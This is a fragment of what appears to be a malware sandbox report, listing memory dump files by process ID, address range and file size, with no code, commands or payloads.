memory/3652-455-0x00007FF7B4D00000-0x00007FF7B56E5000-memory.dmpFilesize
9.9MB
-
memory/3652-393-0x00007FF7B4D00000-0x00007FF7B56E5000-memory.dmpFilesize
9.9MB
-
memory/3652-394-0x00007FF7B4D00000-0x00007FF7B56E5000-memory.dmpFilesize
9.9MB
-
memory/3688-352-0x000001CB99DA0000-0x000001CB99DB0000-memory.dmpFilesize
64KB
-
memory/3688-356-0x000001CBFDF90000-0x000001CBFDF9A000-memory.dmpFilesize
40KB
-
memory/3688-330-0x000001CBFDFA0000-0x000001CBFDFC2000-memory.dmpFilesize
136KB
-
memory/3688-350-0x000001CBFDFD0000-0x000001CBFDFEC000-memory.dmpFilesize
112KB
-
memory/3688-353-0x00007FF460E90000-0x00007FF460EA0000-memory.dmpFilesize
64KB
-
memory/3688-351-0x000001CB99DA0000-0x000001CB99DB0000-memory.dmpFilesize
64KB
-
memory/3688-354-0x000001CBFDF80000-0x000001CBFDF8A000-memory.dmpFilesize
40KB
-
memory/3688-355-0x000001CB9A7B0000-0x000001CB9A7B8000-memory.dmpFilesize
32KB
-
memory/3748-314-0x00007FF6C22A0000-0x00007FF6C2C85000-memory.dmpFilesize
9.9MB
-
memory/3748-386-0x00007FF6C22A0000-0x00007FF6C2C85000-memory.dmpFilesize
9.9MB
-
memory/4164-429-0x0000000004A50000-0x0000000004A60000-memory.dmpFilesize
64KB
-
memory/4164-428-0x0000000004A50000-0x0000000004A60000-memory.dmpFilesize
64KB
-
memory/4696-456-0x0000025DCFBB0000-0x0000025DCFBC0000-memory.dmpFilesize
64KB
-
memory/4772-168-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-186-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB
-
memory/4772-176-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-175-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/4772-257-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/4772-308-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-256-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-172-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-258-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-169-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4772-310-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB